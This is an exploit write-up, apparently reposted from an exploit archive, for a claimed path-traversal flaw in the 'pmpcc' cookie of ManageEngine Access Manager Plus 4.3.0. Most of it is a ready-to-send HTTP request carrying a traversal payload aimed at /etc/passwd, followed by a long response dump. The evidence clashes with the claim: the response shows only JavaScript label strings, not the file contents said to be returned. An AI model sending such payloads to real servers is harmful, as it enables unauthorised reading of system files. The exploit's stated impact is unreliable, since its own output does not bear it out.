Share 
## https://sploitus.com/exploit?id=PACKETSTORM:171645
## Exploit Title: ManageEngine Access Manager Plus 4.3.0 - File-path-traversal  
## Author: nu11secur1ty  
## Date: 11.22.2023  
## Vendor: https://www.manageengine.com/  
## Software: https://www.manageengine.com/privileged-session-management/download.html  
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ManageEngine/Access-Manager-Plus-version-4.3-(Build-4309)  
  
## Description:  
The `pmpcc` cookie is vulnerable to path traversal attacks, enabling  
read access to arbitrary files on the server.  
The testing payload  
..././..././..././..././..././..././..././..././..././..././etc/passwd  
was submitted in the pmpcc cookie.  
The requested file was returned in the application's response.  
The attacker easy can see all the JS structures of the server and can  
perform very dangerous actions.  
  
## STATUS: HIGH Vulnerability  
  
[+] Exploits:  
```GET  
GET /amp/webapi/?requestType=GET_AMP_JS_VALUES HTTP/1.1  
Host: localhost:9292  
Accept-Encoding: gzip, deflate  
Accept: */*  
Accept-Language: en-US;q=0.9,en;q=0.8  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107  
Safari/537.36  
Connection: close  
Cache-Control: max-age=0  
Cookie: pmpcc=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd;  
_zcsr_tmp=41143b42-8ff3-4fb0-8b30-688f63f9bf9a;  
JSESSIONID=2D2DB63E708680CBC717A8A165CE1D6E;  
JSESSIONIDSSO=314212F36F55D2CE1E7A76F98800E194  
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"  
Sec-CH-UA-Mobile: ?0  
X-Requested-With: XMLHttpRequest  
Sec-CH-UA-Platform: Windows  
Referer: https://localhost:9292/AMPHome.html  
```  
  
[+] Response:  
  
```  
,'js.pmp.helpCertRequest.subcontent10':'The issued certificate is  
e-mailed to the user who raises the request, the user who closes the  
request and also to those e-mail ids specified at the time of closing  
the request.'  
,'js.admin.HelpDeskIntegrate.UsernameEgServiceNow':'ServiceNow login username'  
,'js.PassTrixMainTab.ActiveDirectory.next_schedule_time':'Next  
synchronization is scheduled to run on'  
,'js.agent.csharp_Windows_Agent':'C# Windows Agent'  
,'js.PassTrixMainTab.in_sec':'Seconds'  
,'godaddy.importcsr.selectfileorpastecontent':'Either select a file or  
paste the CSR content.'  
,'js.connection.colors':'Colors'  
,'js.general.ShareToGroups':'Share resource to user groups'  
,'js.connection.mapdisk':'Drives'  
,'jsp.admin.Support.User_Forums':'User Forums'  
,'js.general.CreateResource.Dns_url_check':'Enter a valid URL . For  
cloud services (Rackspace and AWS IAM), the DNS name <br>looks like a  
URL (ex: https:\/\/identity.api.rackspacecloud.com\/v2.0)'  
,'js.admin.RPA_Integration.About':'PAM360 renders bots that seamlessly  
integrate and perfectly fit into the pre-designed and automated  
integrations of the below listed RPA-powered platforms, to simulate  
the routine manual password retrieval from the PAM360 vault.'  
,'js.discovery.loadhostnamefromfile':'From file'  
,'js.AddListenerDetails.Please_enter_valid_implementation_class':'Please  
enter a valid Implementation Class'  
,'js.general.GroupedResources':'Grouped Resources'  
,'js.general.SlaveServer':'This operation is not permitted in Secondary Server.'  
,'PROCESSID':'Process Id'  
,'js.resources.serviceaccount.SupportedSAccounts.Services_fetched_successfully':'Services  
fetched successfully'  
,'assign.defaultdns.nodnsconfigured':'No default DNS available\/enabled'  
,'js.commonstr.search':'Search'  
,'js.discovery.usercredential_type':'Credential Type'  
,'jsp.admin.GeneralSetting.Check_high_availability_status_for':'Check  
high availability status every <input type=\"text\" class=\"txtbox\"  
name=\"check_duration\" value=\"{0}\" size=\"5\" maxlength=\"5\"  
style=\"width:60px\" onkeypress=\"if(event.keyCode==13)return false;\"  
> minutes.'  
,'pki.js.help.entervalidnumber':'Please enter a valid number for  
Numeric Field Default Value.'  
,'js.remoteapp.fetch':'Fetch'  
,'js.admin.HighAvailability.configured_successfully':'Configured Successfully'  
,'js.generalSettings_searchTerm_Password_reset':'Password Reset,  
Reason for password reset, disable ticket id, waiting time, wait time  
for service account password reset, linux unix password reset'  
,'letsencrypt.enter.domainnames':'Enter domain names'  
,'js.discovery.resourcetype':'Resource Type'  
,'js.HomeTab.UserTab':'Set this tab as default view for \'Users\''  
,'js.report.timeline.todate':'Valid To'  
,'js.general_Language_Changed_Successfully':'Language Changed Successfully'  
,'js.aws.credentials.label':'AWS Credential'  
,'auditpurge.helpnote1':'Enter 0 or leave the field blank to disable  
purging of audit trails.'  
,'js.general.user.orgn_bulkManage':'Manage Organization'  
,'js.rolename.SSH_KEY':'Create\/Add key'  
,'js.admin.admin.singledbmultiserver.name':'Application Scaling'  
,'lets.encrypt.requestreport':'Let\'s Encrypt Requests Report'  
,'js.settings.breach_settings.disable_api':'Disable API Access'  
,'js.cmd.delete.not_possible':'Command cannot be deleted as it is  
already added to the following command set(s).'  
,'js.settings.notification.domaincontent':'Notify if domains are  
expiring within'  
,'js.aws.searchuser':'--Search UserName--'  
,'jsp.admin.GeneralSetting.helpdesk_conf':'Configure the ticketing  
system settings in Admin >> General >> Ticketing System Integration.'  
,'js.discovery.port':'Gateway Port'  
,'usermanagement.showCertificates':'Show Certificates'  
,'js.general.DestinationDirectoryCannotBeEmpty':'Destination directory  
cannot be empty'  
,'js.sshreport.title':'SSH Resource Report'  
,'js.encryptionkey.update':'Update'  
,'js.aws.regions':'Region'  
,'js.settingsTitle1.UserManagement':'User Management'  
,'js.passwordPolicy.setRange':'Enforce minimum or maximum password length'  
,'js.commonstr.selectResources':'Select Resources'  
,'RULENAME':'Rule Name'  
,'jsp.admin.usergroups.AddUserGroupDialog.User_Group_added_successfully':'User  
Group added successfully'  
,'js.reports.SSHReports.title':'SSH Reports'  
,'js.CommonStr.ValueIsLess':'value is less than 2'  
,'js.discovery.discoverystatus':'Discovery Status'  
,'js.settings.security_settings.Web_Access':'Web Access'  
,'js.general.node_name_cannot_be_empty':'Node name cannot be empty'  
,'js.deploy.audit':'Deploy Audit'  
,'js.agentdiscovery.msca.title':'Microsoft Certificate Authority'  
,'jsp.resources.AccessControlView.Choose_the_excluded_groups':'Nominate  
user group(s) to exempt from access control.'  
,'js.pki.SelectCertificateGroup':'Select Certificate Group(s)'  
,'js.admin.HighAvailability.High_Availability_status':'Status'  
,'settings.metracker.note0':'Disable ME Tracker if you do not wish to  
allow ManageEngine to collect product usage details.'  
,'SERVICENAME':'Service Name'  
,'settings.metracker.note1':'Access Manager Plus server has to be  
restarted for the changes to take effect.'  
,'js.general.NewPinMismatch':'New PIN Mismatch'  
,'js.HomeTab.ResourceTab':'Set this tab as default view for \'Resources\''  
,'java.ScheduleUtil.minutes':'minutes'  
,'js.admin.sdpop_change.tooltip':'Enabling this option will require  
your users to provide valid Change IDs for the validation of password  
access requests and other similar operations. Leaving this option  
unchecked requires the users to submit valid Request IDs for  
validation.'  
,'js.privacy_settings.title.redact':'Redact'  
,'js.admin.passwordrequests.Target_Resource_Selection_Alert':'Only 25  
resources can be selected'  
,'js.aboutpage.websitetitle':'Website'  
,'js.customize.NumericField':'Numeric Field'  
,'js.please.select.file':'Please select a file to upload.'  
,'js.AutoLogon.Remote_connections':'Remote Connections'  
,'pki.snmp.port':'Port'  
,'java.dashboardutils.TODAY':'TODAY'  
,'js.schedule.starttime':'Start Time'  
,'js.ssh.keypassphrase':'Passphrase'  
,'js.gettingstarted.keystore.step1.one':'Add keys to Access Manager Plus'  
,'js.analytics.tab.ueba.msg4':'guide'  
,'js.analytics.tab.ueba.msg5':'to complete the integration. For any  
further questions, please write to us at  
pam360-support@manageengine.com.'  
,'js.reportType.Option7.UserAuditReport':'Audit Report'  
,'js.common.csr':'CSR'  
,'js.globalsign.reissue.order':'Reissue Order'  
,'js.analytics.tab.ueba.msg6':'Build a platform of expected behavior  
for individual users and entities by mapping different user accounts'  
,'js.analytics.tab.ueba.msg7':'Verify actionable reports that  
symbolize compromise with details about actual behavior and expected  
behavior.'  
,'js.resources.importcredential':'Import Credentials'  
,'js.analytics.tab.ueba.msg1':'The Advanced Analytics module for  
PAM360, offered via ManageEngine Log360 UEBA, analyzes logs from  
different sources, including firewalls, routers, workstations,  
databases, file servers and cloud services. Any deviation from normal  
behavior is classified as a time, count, or pattern anomaly. It then  
gives actionable insight to the IT Administrator with the use of risk  
scores, anomaly trends, and intuitive reports.'  
,'js.analytics.tab.ueba.msg2':'With Log360 UEBA analytics, you can:'  
,'js.analytics.tab.ueba.msg3':'To activate Log360 UEBA for your PAM360  
instance, download Log360 UEBA from the below link and follow the  
instructions in this'  
,'js.settingsTitle2.MailServer':'Mail Server'  
,'jsp.admin.managekey.ChangeKey.Managing_the_PMP_encryption_key':'Managing  
AMP Encryption Key'  
,'settings.unmappedmails.email':'E-mail Address'  
,'amp.connection.connection_type':'Connection Type'  
,'js.analytics.tab.ueba.msg8':'Diagnose anomalous user behavior based  
on activity time, count, and pattern.'  
,'godaddy.contactphone':'Contact Phone'  
,'js.general.HelpDeskIntegrate.ClassSameException':'Class name already  
implemented. Implement with some other class.'  
,'js.analytics.tab.ueba.msg9':'Track abnormal entity behaviors in  
Windows devices, SQL servers, FTP servers, and network devices such as  
routers, firewalls, and switches.'  
,'js.rolename.freeCA.acme':'ACME'  
,'digicert.label.dcv.cname':'CNAME Token'  
,'js.helpcontent.createuser':'User Creation '  
,'pgpkeys.key.details':'Key Information'  
,'js.resources.discovery.ResourceDiscoveryStatus.discovery':'Discovery Status'  
,'js.HomeTab.TaskAuditView':'Task Audit'  
,'pki.js.certs.certGroupsSharedByUserGroups':'Certificate Groups  
Shared With User Group(s)'  
,'js.common.importcsr.format':'(File format should be .csr)'  
,'js.notificationpolicy.Submit':'Save'  
,'pmp.vct.User_Audit_Configuration':'User Audit Configuration'  
...  
...  
...  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ManageEngine/Access-Manager-Plus-version-4.3-(Build-4309))  
  
## Reference:  
[href](https://portswigger.net/kb/issues/00100300_file-path-traversal)  
  
## Proof and Exploit:  
[href](https://streamable.com/scdzsb)  
  
## Time spent  
`03:00:00`